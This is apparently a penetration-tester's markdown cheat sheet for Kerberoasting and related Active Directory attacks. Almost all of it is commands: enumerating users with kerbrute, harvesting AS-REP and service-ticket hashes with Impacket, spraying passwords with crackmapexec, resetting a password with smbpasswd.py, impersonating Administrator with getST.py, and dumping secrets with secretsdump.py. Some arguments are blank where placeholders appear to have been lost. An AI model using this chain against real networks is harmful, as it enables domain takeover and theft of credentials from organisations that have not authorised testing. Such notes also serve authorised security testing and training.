# Kerberoast ## Usage ### List users ```sh kerbrute userenum -d $DOMAIN --dc $TARGET_IP $USER_LIST ``` ### Get Users * Impacket's `GetNPUsers.py` to get Hashes of userlist ```sh GetNPUsers.py -no-pass / -usersfile users.txt -format john -outputfile hashes ``` ### Find SPNs ```sh GetUserSPNs.py -request /: -dc-ip $TARGET_IP ``` or ```sh pyverview get-netuser -u -p -t -d ``` ### Further Intel ```sh findDelegation.py -debug /: -dc-ip $TARGET_IP ``` ### Check Found Users * Use crackmapexec to check access to further user accounts with the password of the user found with `GetNPUsers.py` ```sh crackmapexec smb $TARGET_IP -u users.txt -p pass.txt ``` * Watch out for `STATUS_PASSWORD_MUST_CHANGE` * Change password with ```sh smbpasswd.py @$TARGET_IP -newpass password123 ``` ### Impersonate ```sh getST.py -spn / -impersonate Administrator '/:' -dc-ip $TARGET_IP ``` * Serviceticket is save as `Administrator.ccache` * `export KRB5CCNAME=Administrator.ccache` * After that dump secrets ```sh secretsdump.py -k -no-pass ```